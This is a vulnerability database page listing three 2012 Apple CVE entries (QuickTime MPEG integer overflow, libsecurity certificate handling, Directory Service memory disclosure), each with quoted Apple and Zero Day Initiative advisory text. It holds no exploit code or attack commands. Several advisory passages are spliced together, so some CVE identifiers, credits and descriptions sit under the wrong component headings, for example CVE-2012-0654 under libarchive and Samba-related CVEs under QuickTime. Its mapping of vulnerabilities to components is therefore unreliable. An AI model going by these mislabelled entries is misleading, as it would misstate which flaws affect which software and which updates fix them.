VARIoT IoT vulnerabilities database
| VAR-201205-0232 | CVE-2012-0659 | Apple Mac OS X QuickTime integer overflow vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Integer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted MPEG file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within how the application calculates the padding for an MPEG sample. When calculating the padding, the MPEG library will subtract this from another length without checking for underflow. This resulting length will then be used in a memcpy operation into a statically sized buffer allocated on the heap. This can lead to code execution under the context of the application. Apple Mac OS X is prone to an integer-overflow vulnerability that affects the QuickTime component.
Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it.
APPLE-SA-2012-05-15-1 QuickTime 7.7.2
QuickTime 7.7.2 is now available and addresses the following:
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple stack overflows existed in QuickTime's
handling of TeXML files. These issues do not affect OS X systems.
CVE-ID
CVE-2012-0663 : Alexander Gavrun working with HP's Zero Day
Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap overflow existed in QuickTime's handling of text
tracks. This issue does not affect OS X systems.
CVE-ID
CVE-2012-0664 : Alexander Gavrun working with HP's Zero Day
Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in the handling of H.264
encoded movie files.
CVE-ID
CVE-2012-0665 : Luigi Auriemma working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Opening a maliciously crafted MP4 encoded file may lead to
an unexpected application termination or arbitrary code execution
Description: An uninitialized memory access issue existed in the
handling of MP4 encoded files. For OS X Lion systems, this issue is
addressed in OS X Lion v10.7.3.
CVE-ID
CVE-2011-3458 : Luigi Auriemma and pa_kt both working with HP's Zero
Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An off by one buffer overflow existed in the handling
of rdrf atoms in QuickTime movie files. For OS X Lion systems, this
issue is addressed in OS X Lion v10.7.3.
CVE-ID
CVE-2011-3459 : Luigi Auriemma working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file during progressive
download may lead to an unexpected application termination or
arbitrary code execution
Description: A buffer overflow existed in the handling of audio
sample tables. For OS X Lion systems, this issue is addressed in OS X
Lion v10.7.4.
CVE-ID
CVE-2012-0659 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: A stack buffer overflow existed in the QuickTime
plugin's handling of QTMovie objects. This issue does not affect OS X
systems.
CVE-ID
CVE-2012-0666 : CHkr_D591 working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Processing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PNG files.
For OS X Lion systems, this issue is addressed in OS X Lion v10.7.3.
CVE-ID
CVE-2011-3460 : Luigi Auriemma working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted QTVR movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of QTVR
movie files. This issue does not affect OS X systems.
CVE-ID
CVE-2012-0667 : Alin Rad Pop working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A use after free issue existed in the handling of
JPEG2000 encoded movie files. This issue does not affect systems
prior to OS X Lion. For OS X Lion systems, this issue is addressed in
OS X Lion v10.7.4.
CVE-ID
CVE-2012-0661 : Damian Put working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of RLE
encoded movie files.
CVE-ID
CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in QuickTime's handling of
Sorenson encoded movie files. This issue does not affect OS X
systems.
CVE-ID
CVE-2012-0669 : Damian Put working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in QuickTime's handling of
sean atoms.
CVE-ID
CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft)
working with HP's Zero Day Initiative
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted .pict file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
.pict files.
CVE-ID
CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the
Qualys Vulnerability & Malware Research Labs (VMRL)
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Opening a file in a maliciously crafted path may lead to an
unexpected application termination or arbitrary code execution
Description: A stack buffer overflow existed in QuickTime's handling
of file paths. This issue does not affect OS X systems.
CVE-ID
CVE-2012-0265 : Tielei Wang of Georgia Tech Information Security
Center via Secunia SVCRP
QuickTime
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted MPEG file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer underflow existed in QuickTime's handling of
audio streams in MPEG files.
CVE-ID
CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability
Research (MSVR)
QuickTime 7.7.2 may be obtained from the QuickTime Downloads site:
http://www.apple.com/quicktime/download/
The download file is named: "QuickTimeInstaller.exe"
Its SHA-1 digest is: ed569d62b3f8c24ac8e9aec7275f17cbb14d2124
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can
be found at:
http://support.apple.com/kb/HT5261
-- Disclosure Timeline:
2011-10-21 - Vulnerability reported to vendor
2012-06-06 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
* pa_kt / twitter.com/pa_kt / e1c14ba6
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201205-0230 | CVE-2012-0654 | Apple Mac OS X libsecurity arbitrary code execution vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
libsecurity in Apple Mac OS X before 10.7.4 accesses uninitialized memory locations during the processing of X.509 certificates, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted certificate. Apple Mac OS X is prone to a remote memory corruption vulnerability that affects the 'libsecurity' component.
Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it.
APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002
OS X Lion v10.7.4 and Security Update 2012-002 is now available and
addresses the following:
Login Window
Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: Remote admins and persons with physical access to the system
may obtain account information
Description: An issue existed in the handling of network account
logins. The login process recorded sensitive information in the
system log, where other users of the system could read it. The
sensitive information may persist in saved logs after installation of
this update. See http://support.apple.com/kb/TS4272 for more
information on how to securely remove any remaining records. This
issue only affects systems running OS X Lion v10.7.3 with users of
Legacy File Vault and/or networked home directories.
CVE-ID
CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State
University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine
Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State
University, Paul Nelson
Bluetooth
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A temporary file race condition issue existed in
blued's initialization routine.
CVE-ID
CVE-2012-0649 : Aaron Sigel of vtty.com
curl
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
curl disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by enabling empty fragments.
CVE-ID
CVE-2011-3389 : Apple
curl
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Using curl or libcurl with a maliciously crafted URL may
lead to protocol-specific data injection attacks
Description: A data injection issue existed in curl's handling of
URLs. This issue is addressed through improved validation of URLs.
This issue does not affect systems prior to OS X Lion.
CVE-ID
CVE-2012-0036
Directory Service
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8
Impact: A remote attacker may obtain sensitive information
Description: Multiple issues existed in the directory server's
handling of messages from the network. By sending a maliciously
crafted message, a remote attacker could cause the directory server
to disclose memory from its address space, potentially revealing
account credentials or other sensitive information. This issue does
not affect OS X Lion systems. The Directory Server is disabled by
default in non-server installations of OS X.
CVE-ID
CVE-2012-0651 : Agustin Azubel
HFS
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Mounting a maliciously crafted disk image may lead to a
system shutdown or arbitrary code execution
Description: An integer underflow existed in the handling of HFS
catalog files.
CVE-ID
CVE-2012-0642 : pod2g
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in ImageIO's handling of
CCITT Group 4 encoded TIFF files. This issue does not affect OS X
Lion systems. Further information is available via the libpng website
at http://www.libpng.org/pub/png/libpng.html
CVE-ID
CVE-2011-2692
CVE-2011-3328
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue is addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Kernel
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: When FileVault is used, the disk may contain unencrypted
user data
Description: An issue in the kernel's handling of the sleep image
used for hibernation left some data unencrypted on disk even when
FileVault was enabled. This issue is addressed through improved
handling of the sleep image, and by overwriting the existing sleep
image when updating to OS X v10.7.4. This issue does not affect
systems prior to OS X Lion.
CVE-ID
CVE-2011-3212 : Felix Groebert of Google Security Team
libarchive
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Extracting a maliciously crafted archive may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple buffer overflows existed in the handling of
tar archives and iso9660 files.
CVE-ID
CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme
Prado of Conselho da Justica Federal, Ryan Sleevi of Google
libsecurity
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Support for X.509 certificates with insecure-length RSA keys
may expose users to spoofing and information disclosure
Description: Certificates signed using RSA keys with insecure key
lengths were accepted by libsecurity. This issue is addressed by
rejecting certificates containing RSA keys less than 1024 bits. These issues are addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
LoginUIFramework
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: If the Guest user is enabled, a user with physical access to
the computer may be able to log in to a user other than the Guest
user without entering a password
Description: A race condition existed in the handling of Guest user
logins. This issue does not affect systems prior to OS X Lion.
CVE-ID
CVE-2012-0656 : Francisco Gomez (espectalll123)
PHP
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Multiple vulnerabilities in PHP
Description: PHP is updated to version 5.3.10 to address several
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the PHP web site at
http://www.php.net
CVE-ID
CVE-2011-4566
CVE-2011-4885
CVE-2012-0830
Quartz Composer
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: A user with physical access to the computer may be able to
cause Safari to launch if the screen is locked and the RSS Visualizer
screen saver is used
Description: An access control issue existed in Quartz Composer's
handling of screen savers. This issue is addressed through improved
checking for whether or not the screen is locked.
CVE-ID
CVE-2012-0657 : Aaron Sigel of vtty.com
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted movie file during progressive
download may lead to an unexpected application termination or
arbitrary code execution
Description: A buffer overflow existed in the handling of audio
sample tables.
CVE-ID
CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted MPEG file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of MPEG
files.
CVE-ID
CVE-2012-0659 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted MPEG file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer underflow existed in the handling of MPEG
files.
CVE-ID
CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability
Research
QuickTime
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A use after free issue existed in the handling of
JPEG2000 encoded movie files. This issue does not affect systems
prior to OS X Lion. These issues do not
affect OS X Lion systems.
CVE-ID
CVE-2012-0870 : Andy Davis of NGS Secure
CVE-2012-1182 : An anonymous researcher working with HP's Zero Day
Initiative
Security Framework
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: A remote attacker may cause an unexpected application
termination or arbitrary code execution
Description: An integer overflow existed in the Security framework.
Processing untrusted input with the Security framework could result
in memory corruption. This issue does not affect 32-bit processes.
CVE-ID
CVE-2012-0662 : aazubel working with HP's Zero Day Initiative
Time Machine
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: A remote attacker may access a user's Time Machine backup
credentials
Description: The user may designate a Time Capsule or remote AFP
volume attached to an AirPort Base Station to be used for Time
Machine backups. Beginning with AirPort Base Station and Time Capsule
Firmware Update 7.6, Time Capsules and Base Stations support a secure
SRP-based authentication mechanism over AFP. However, Time Machine
did not require that the SRP-based authentication mechanism was used
for subsequent backup operations, even if Time Machine was initially
configured or had ever contacted a Time Capsule or Base Station that
supported it. An attacker who is able to spoof the remote volume
could gain access to user's Time Capsule credentials, although not
backup data, sent by the user's system. This issue is addressed by
requiring use of the SRP-based authentication mechanism if the backup
destination has ever supported it.
CVE-ID
CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc.
X11
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Applications that use libXfont to process LZW-compressed
data may be vulnerable to an unexpected application termination or
arbitrary code execution
Description: A buffer overflow existed in libXfont's handling of
LZW-compressed data. This issue is addressed by updating libXfont to
version 1.4.4.
CVE-ID
CVE-2011-2895 : Tomas Hoger of Red Hat
Note: Additionally, this update filters dynamic linker environment
variables from a customized environment property list in the user's
home directory, if present.
OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
Security Update 2012-002 or OS X v10.7.4.
For OS X Lion v10.7.3
The download file is named: MacOSXUpd10.7.4.dmg
Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36
For OS X Lion v10.7 and v10.7.2
The download file is named: MacOSXUpdCombo10.7.4.dmg
Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f
For OS X Lion Server v10.7.3
The download file is named: MacOSXServerUpd10.7.4.dmg
Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2
For OS X Lion Server v10.7 and v10.7.2
The download file is named: MacOSXServerUpdCombo10.7.4.dmg
Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240
For Mac OS X v10.6.8
The download file is named: SecUpd2012-002Snow.dmg
Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2012-002.dmg
Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201205-0228 | CVE-2012-0651 | Apple Mac OS X Directory Service sensitive information disclosure vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The directory server in Directory Service in Apple Mac OS X 10.6.8 allows remote attackers to obtain sensitive information from process memory via a crafted message. Apple Mac OS X is prone to multiple information-disclosure vulnerabilities.
Attackers can leverage these issues to gain access to sensitive information. Information obtained may aid in further attacks.
Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it.
APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002
OS X Lion v10.7.4 and Security Update 2012-002 is now available and
addresses the following:
Login Window
Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: Remote admins and persons with physical access to the system
may obtain account information
Description: An issue existed in the handling of network account
logins. The login process recorded sensitive information in the
system log, where other users of the system could read it. The
sensitive information may persist in saved logs after installation of
this update. See http://support.apple.com/kb/TS4272 for more
information on how to securely remove any remaining records. This
issue only affects systems running OS X Lion v10.7.3 with users of
Legacy File Vault and/or networked home directories.
CVE-ID
CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State
University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine
Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State
University, Paul Nelson
Bluetooth
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A temporary file race condition issue existed in
blued's initialization routine.
CVE-ID
CVE-2012-0649 : Aaron Sigel of vtty.com
curl
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
curl disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by enabling empty fragments.
CVE-ID
CVE-2011-3389 : Apple
curl
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Using curl or libcurl with a maliciously crafted URL may
lead to protocol-specific data injection attacks
Description: A data injection issue existed in curl's handling of
URLs. This issue is addressed through improved validation of URLs.
This issue does not affect systems prior to OS X Lion. This issue does
not affect OS X Lion systems. The Directory Server is disabled by
default in non-server installations of OS X.
CVE-ID
CVE-2012-0651 : Agustin Azubel
HFS
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Mounting a maliciously crafted disk image may lead to a
system shutdown or arbitrary code execution
Description: An integer underflow existed in the handling of HFS
catalog files.
CVE-ID
CVE-2012-0642 : pod2g
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in ImageIO's handling of
CCITT Group 4 encoded TIFF files. This issue does not affect OS X
Lion systems. Further information is available via the libpng website
at http://www.libpng.org/pub/png/libpng.html
CVE-ID
CVE-2011-2692
CVE-2011-3328
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue is addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Kernel
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: When FileVault is used, the disk may contain unencrypted
user data
Description: An issue in the kernel's handling of the sleep image
used for hibernation left some data unencrypted on disk even when
FileVault was enabled. This issue is addressed through improved
handling of the sleep image, and by overwriting the existing sleep
image when updating to OS X v10.7.4. This issue does not affect
systems prior to OS X Lion.
CVE-ID
CVE-2011-3212 : Felix Groebert of Google Security Team
libarchive
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Extracting a maliciously crafted archive may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple buffer overflows existed in the handling of
tar archives and iso9660 files.
CVE-ID
CVE-2011-1777
CVE-2011-1778
libsecurity
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Verifying a maliciously crafted X.509 certificate, such as
when visiting a maliciously crafted website, may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access issue existed in the
handling of X.509 certificates.
CVE-ID
CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme
Prado of Conselho da Justica Federal, Ryan Sleevi of Google
libsecurity
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Support for X.509 certificates with insecure-length RSA keys
may expose users to spoofing and information disclosure
Description: Certificates signed using RSA keys with insecure key
lengths were accepted by libsecurity. This issue is addressed by
rejecting certificates containing RSA keys less than 1024 bits.
CVE-ID
CVE-2012-0655
libxml
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted web page may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues are addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
LoginUIFramework
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: If the Guest user is enabled, a user with physical access to
the computer may be able to log in to a user other than the Guest
user without entering a password
Description: A race condition existed in the handling of Guest user
logins. This issue does not affect systems prior to OS X Lion.
CVE-ID
CVE-2012-0656 : Francisco Gomez (espectalll123)
PHP
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Multiple vulnerabilities in PHP
Description: PHP is updated to version 5.3.10 to address several
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the PHP web site at
http://www.php.net
CVE-ID
CVE-2011-4566
CVE-2011-4885
CVE-2012-0830
Quartz Composer
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: A user with physical access to the computer may be able to
cause Safari to launch if the screen is locked and the RSS Visualizer
screen saver is used
Description: An access control issue existed in Quartz Composer's
handling of screen savers. This issue is addressed through improved
checking for whether or not the screen is locked.
CVE-ID
CVE-2012-0657 : Aaron Sigel of vtty.com
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted movie file during progressive
download may lead to an unexpected application termination or
arbitrary code execution
Description: A buffer overflow existed in the handling of audio
sample tables.
CVE-ID
CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted MPEG file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of MPEG
files.
CVE-ID
CVE-2012-0659 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted MPEG file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer underflow existed in the handling of MPEG
files.
CVE-ID
CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability
Research
QuickTime
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A use after free issue existed in the handling of
JPEG2000 encoded movie files. This issue does not affect systems
prior to OS X Lion. By sending a maliciously crafted packet,
an unauthenticated remote attacker could cause a denial of service or
arbitrary code execution with system privileges. These issues do not
affect OS X Lion systems.
CVE-ID
CVE-2012-0870 : Andy Davis of NGS Secure
CVE-2012-1182 : An anonymous researcher working with HP's Zero Day
Initiative
Security Framework
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3
Impact: A remote attacker may cause an unexpected application
termination or arbitrary code execution
Description: An integer overflow existed in the Security framework.
Processing untrusted input with the Security framework could result
in memory corruption. This issue does not affect 32-bit processes.
CVE-ID
CVE-2012-0662 : aazubel working with HP's Zero Day Initiative
Time Machine
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: A remote attacker may access a user's Time Machine backup
credentials
Description: The user may designate a Time Capsule or remote AFP
volume attached to an AirPort Base Station to be used for Time
Machine backups. Beginning with AirPort Base Station and Time Capsule
Firmware Update 7.6, Time Capsules and Base Stations support a secure
SRP-based authentication mechanism over AFP. However, Time Machine
did not require that the SRP-based authentication mechanism was used
for subsequent backup operations, even if Time Machine was initially
configured or had ever contacted a Time Capsule or Base Station that
supported it. An attacker who is able to spoof the remote volume
could gain access to user's Time Capsule credentials, although not
backup data, sent by the user's system. This issue is addressed by
requiring use of the SRP-based authentication mechanism if the backup
destination has ever supported it.
CVE-ID
CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc.
X11
Available for: OS X Lion v10.7 to v10.7.3,
OS X Lion Server v10.7 to v10.7.3
Impact: Applications that use libXfont to process LZW-compressed
data may be vulnerable to an unexpected application termination or
arbitrary code execution
Description: A buffer overflow existed in libXfont's handling of
LZW-compressed data. This issue is addressed by updating libXfont to
version 1.4.4.
CVE-ID
CVE-2011-2895 : Tomas Hoger of Red Hat
Note: Additionally, this update filters dynamic linker environment
variables from a customized environment property list in the user's
home directory, if present.
OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/
